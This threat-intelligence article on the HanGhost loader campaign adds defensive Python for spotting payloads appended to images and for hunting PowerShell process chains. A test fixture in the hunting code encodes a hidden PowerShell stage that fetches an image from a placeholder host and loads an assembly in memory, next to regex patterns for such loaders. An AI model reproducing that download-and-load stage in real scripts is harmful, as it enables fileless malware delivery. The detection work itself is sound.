A new malware campaign built around the HanGhost loader is actively targeting corporate environments, focusing on employees involved in payments, logistics, and contract operations. The attack is designed to operate without leaving clear artifacts, enabling it to reach systems linked to revenue and operations before they are fully analyzed. The campaign has already shown multiple waves of activity with different malware families, indicating active development and scaling rather than a one-off attack.[1]
How the Attack Unfolds and Why Most SOCs See It Too Late - The attack chain combines multiple techniques that, individually, appear benign but together create a highly evasive execution flow.
See full attack analysis inside the ANY.RUN sandbox[2]
The attack utilizes scripts and PowerShell
It starts with obfuscated JavaScript that executes hidden PowerShell commands. These commands execute a .NET loader directly in memory, which then retrieves a seemingly harmless image file containing an encrypted payload. The payload is extracted and executed without ever being written to disk.
The malware payload hides inside an image
This chain is used to deliver multiple malware families, including PureHVNC, XWorm, Meduza, AgentTesla, and Phantom, with some cases also deploying UltraVNC for persistent remote access. Because each stage looks benign on its own (a script, a PowerShell process, an image download), the chain produces alerts that are either low-priority or lack sufficient context, which slows triage and delays response.
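One cheap, host-side check a defender can run on image files pulled from suspicious PowerShell activity is to ask whether the file ends where the image format says it should. The following is an added example, not code from the article or from ANY.RUN; it assumes the payload is appended after the image proper (after the PNG IEND chunk or the JPEG EOI marker), which is one common carrier technique, and it reports the size and byte entropy of whatever trails the image. Payloads hidden in pixel data or inside metadata chunks are not caught by it, so a clean result is not a verdict, only the absence of this one signal. All sample images and the random "encrypted stage" are constructed in the block.

```python
"""Flag PNG/JPEG files that carry data beyond the image's terminal marker.

Added example; not the article's or ANY.RUN's code. Assumption: the payload is
appended after IEND (PNG) or EOI (JPEG). Stego in pixel data is not covered.
"""
import math
import random
import struct
import zlib
from typing import Optional

PNG_SIG = b"\x89PNG\r\n\x1a\n"
JPEG_SOI = b"\xff\xd8"


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: near 8.0 for encrypted/compressed data, far lower for text."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def png_end_offset(data: bytes) -> Optional[int]:
    """Walk PNG chunks; return the offset just past IEND, or None if never reached."""
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        pos += 8 + length + 4  # length + type, payload, CRC
        if ctype == b"IEND":
            return pos
    return None


def jpeg_end_offset(data: bytes) -> Optional[int]:
    """Walk JPEG segments (skipping entropy-coded scan data); return offset past EOI."""
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return None
        marker = data[pos + 1]
        if marker == 0xD9:  # EOI
            return pos + 2
        if marker == 0x01 or 0xD0 <= marker <= 0xD8:  # standalone markers carry no length
            pos += 2
            continue
        if pos + 4 > len(data):
            return None
        (seglen,) = struct.unpack(">H", data[pos + 2:pos + 4])
        pos += 2 + seglen
        if marker == 0xDA:  # SOS: scan data runs until a real (non-stuffed, non-RST) marker
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    return None


def analyse_image(data: bytes, min_trailer: int = 64, entropy_threshold: float = 7.0) -> dict:
    """Report trailer size/entropy; a large high-entropy trailer is worth detonating."""
    if data.startswith(PNG_SIG):
        fmt, end = "png", png_end_offset(data)
    elif data.startswith(JPEG_SOI):
        fmt, end = "jpeg", jpeg_end_offset(data)
    else:
        fmt, end = "unknown", None
    report = {"format": fmt, "trailer_bytes": 0, "trailer_entropy": 0.0,
              "suspicious": False, "likely_encrypted": False}
    if end is None:
        report["suspicious"] = fmt != "unknown"  # known signature but no proper terminator
        return report
    trailer = data[end:]
    ent = round(shannon_entropy(trailer), 2)
    big = len(trailer) >= min_trailer
    report.update(trailer_bytes=len(trailer), trailer_entropy=ent,
                  suspicious=big, likely_encrypted=big and ent >= entropy_threshold)
    return report


# --- constructed fixtures (not real campaign samples) ---------------------------
def _png_chunk(ctype: bytes, payload: bytes) -> bytes:
    body = ctype + payload
    return struct.pack(">I", len(payload)) + body + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF)


def build_samples() -> dict:
    """Minimal valid 1x1 PNG and a structurally valid JPEG skeleton, with/without trailers."""
    png = (PNG_SIG + _png_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0))
           + _png_chunk(b"IDAT", zlib.compress(b"\x00\xff\x00\x00")) + _png_chunk(b"IEND", b""))
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
    jpeg = JPEG_SOI + app0 + sos + b"\x12\x34\xff\x00\x56" + b"\xff\xd9"  # FF 00 = byte stuffing
    blob = random.Random(7).randbytes(4096)  # deterministic stand-in for an encrypted stage
    return {"clean_png": png, "png_with_blob": png + blob, "png_with_text": png + b"A" * 4096,
            "truncated_png": png[:-12], "clean_jpeg": jpeg, "jpeg_with_blob": jpeg + blob}
```

Run `analyse_image(open(path, "rb").read())` over images recovered from a sandbox run or a proxy cache; files with a large trailer, and especially a trailer whose entropy sits near 8 bits per byte, should go straight to detonation. The thresholds (64 bytes, 7.0 bits) are assumptions to tune against your own image corpus.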
Attackers Are Targeting Finance and Operations Roles in Businesses - The targeting model is deliberate. Instead of targeting infrastructure or privileged admins, attackers focus on users who interact with financial processes and operational systems daily. These users regularly run scripts, open attachments, and communicate externally, making malicious activity harder to distinguish from normal behavior. Once compromised, their access can be used to influence transactions, documents, and internal workflows.
- Persistent remote access: Tools like PureHVNC and XWorm allow continuous monitoring and control
- Payment systems exposure: Attackers can intercept or modify transaction details during execution
- Contract manipulation risk: Access to documents and email threads enables unauthorized changes or fraud
- Logistics disruption: Compromised workflows can delay shipments and break operational processes.
The impact is linked directly to how these roles interact with business processes, not just system access.
3 Steps CISOs Need to Take to Detect and Stop HanGhost Early - Stopping HanGhost requires changing how triage, response, and threat hunting actually work under pressure. The attack succeeds because teams spend too much time validating signals and not enough time understanding behavior early.
Fix Triage to Show Behavior, Not Indicators - Analysts cannot rely on hashes, domains, or reputation for this type of attack because most of the chain runs in memory and constantly changes. Triage has to start with execution.
ANY.RUN’s Interactive Sandbox exposes HanGhost’s malicious activities in seconds
Suspicious files, scripts, and links need to be detonated immediately in an interactive sandbox so the team can see the real process chain, network activity, and hidden stages. ANY.RUN’s Interactive Sandbox provides SOC teams with a fast, integration-ready solution for detecting malware & phishing attacks inside fully interactive virtual environments across Windows, macOS, Linux, and Android.
Thanks to advanced detection capabilities, Tier 1 analysts can quickly validate alerts, emails, files, and URLs in minutes, ensuring a short MTTR and preventing attacks from evolving into business security breaches.
Rebuild Response Around the Full Execution Chain - Containment decisions cannot be based on isolated alerts or single indicators. Teams need to see the full execution chain, from the initial script to the final payload, and use that to define scope and response actions.
ANY.RUN’s sandbox details the attack TTPs to speed up response
Threat intelligence connects infrastructure, behaviors, and related activity, allowing responders to understand how far the attack may have spread and what needs to be blocked beyond the initial entry point.
Turn Threat Hunting into a Continuation of Real Incidents - Threat hunting should not rely on generic techniques when dealing with active campaigns like this. It needs to start from confirmed behavior observed during triage and response.
Once one case is identified, teams should immediately search for the same execution patterns across the environment and use threat intelligence to identify related activity seen in other organizations. ANY.RUN’s TI Lookup provides SOC teams with the latest attack intel from 15,000 organizations, delivering instant, actionable context on over 40 types of IOCs and providing an industry- and geo-threat landscape view. This expands detection coverage and reduces the chance of missed compromises.
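The hunting step above, searching the environment for the same execution pattern once one case is confirmed, can be expressed as a small scorer over process-creation telemetry. The block below is an added example, not code from the article or from ANY.RUN; the event records are constructed JSON lines whose field names are an assumption loosely modelled on Sysmon process-creation fields, and the weights and flag threshold are likewise assumptions. It looks for the chain the article describes (script host spawning PowerShell, hidden window, an encoded command that, once decoded, loads a .NET assembly from memory after fetching an image), and it decodes the -EncodedCommand argument so the decoded text can be matched too.

```python
"""Hunt process-creation telemetry for the script-host -> PowerShell -> in-memory
.NET loader chain. Added example; not the article's or ANY.RUN's code. Event
field names are an assumption (loosely Sysmon Event ID 1); fixtures are constructed.
"""
import base64
import json
import re
from pathlib import PureWindowsPath
from typing import Optional

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

ENCODED_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")
HIDDEN_RE = re.compile(r"(?i)-(?:w|win|window|windowstyle)\s+hidden")
ASSEMBLY_LOAD_RE = re.compile(r"(?i)Reflection\.Assembly\]::Load")
IMAGE_FETCH_RE = re.compile(r"(?i)(?:DownloadData|DownloadString|Invoke-WebRequest|iwr)\b[^;\n]*\.(?:png|jpe?g|gif|bmp)\b")

# Weights are an assumption: structural signals (who spawned it, what it loads) count more.
WEIGHTS = {"spawned by script host": 2, "hidden window": 1, "encoded command": 1,
           "in-memory assembly load": 2, "image fetched over HTTP": 2}
FLAG_THRESHOLD = 4


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower() if path else ""


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent/undecodable."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev: dict) -> Optional[dict]:
    """Score one process_create event for PowerShell; None for non-PowerShell events."""
    if ev.get("event") != "process_create" or basename(ev.get("image", "")) not in POWERSHELL:
        return None
    cmd = ev.get("command_line", "")
    reasons = []
    if basename(ev.get("parent_image", "")) in SCRIPT_HOSTS:
        reasons.append("spawned by script host")
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden window")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command")
    text = cmd if decoded is None else cmd + "\n" + decoded  # match the decoded script as well
    if ASSEMBLY_LOAD_RE.search(text):
        reasons.append("in-memory assembly load")
    if IMAGE_FETCH_RE.search(text):
        reasons.append("image fetched over HTTP")
    score = sum(WEIGHTS[r] for r in reasons)
    return {"host": ev.get("host"), "process_guid": ev.get("process_guid"), "score": score,
            "flagged": score >= FLAG_THRESHOLD, "reasons": reasons, "decoded_command": decoded}


def hunt(jsonl: str) -> list:
    """Score every PowerShell process_create event in a JSON-lines export."""
    results = []
    for line in jsonl.splitlines():
        if line.strip():
            r = score_event(json.loads(line))
            if r is not None:
                results.append(r)
    return results


# --- constructed fixtures (hypothetical hosts, placeholder URL, not a working loader) ----
def _enc(text: str) -> str:
    return base64.b64encode(text.encode("utf-16-le")).decode()

_STAGE = ("$img=(New-Object Net.WebClient).DownloadData('https://cdn.example.invalid/banner.png');"
          "<decrypt-step-omitted>;[System.Reflection.Assembly]::Load($stage)")
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"event": "process_create", "host": "FIN-WS-07", "process_guid": "{guid-1}",
     "parent_image": r"C:\Windows\explorer.exe", "image": _PS,
     "command_line": "powershell.exe -NoProfile Get-Process"},
    {"event": "process_create", "host": "FIN-WS-07", "process_guid": "{guid-2}",
     "parent_image": r"C:\Windows\System32\wscript.exe", "image": _PS,
     "command_line": f"powershell.exe -w hidden -enc {_enc(_STAGE)}"},
    {"event": "process_create", "host": "LOG-WS-12", "process_guid": "{guid-3}",
     "parent_image": r"C:\Windows\System32\cscript.exe", "image": _PS,
     "command_line": "powershell.exe -w hidden -c Get-Date"},
])
```

Feed `hunt()` the process-creation export for a time window around the confirmed case; flagged entries are the hosts to pull into the incident's scope, and the lower-scoring ones (a script host launching a hidden PowerShell without the loader markers) are the candidates to detonate next. Command lines alone will miss stages that are downloaded and run purely in memory, so in practice pair this with PowerShell script block logging, which records the executed text regardless of how it was delivered.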
ANY.RUN’s TI Lookup gives SOC teams industry and geo attack context
When combined, these capabilities shift SOC operations from reactive validation to proactive understanding. That shift reduces dwell time, lowers incident costs, and prevents attacks from reaching business-critical systems.
Conclusion - HanGhost uses a multi-stage, fileless execution chain to deliver remote-access malware and credential stealers while evading traditional detection. By combining obfuscated scripts, in-memory loaders, and payloads hidden in image files, attackers can reach systems linked to payments, contracts, and operations without leaving clear artifacts.
To stop this type of attack early, SOC teams need to run suspicious files and scripts in a controlled environment to expose their behavior and use real-time threat intelligence to understand how the activity connects to ongoing campaigns. This allows teams to detect the attack earlier, scope it correctly, and respond before it spreads further.
This article is shared at no charge for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. We provide indicators of compromise information (CTI) via a notification service (RedXray) or an analysis service (CTAC). For questions, comments, or assistance, please contact the office directly at 1-844-492-7225 or feedback@redskyalliance.com
- Reporting: https://www.redskyalliance.org/
- Website: https://www.redskyalliance.com/
- LinkedIn: https://www.linkedin.com/company/64265941
Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5207428251321676122
[1] https://hackread.com/active-hanghost-loader-payment-logistic-workflow/
[2] https://app.any.run/tasks/cc26155e-e8e9-442b-b000-8d1a1435e7db/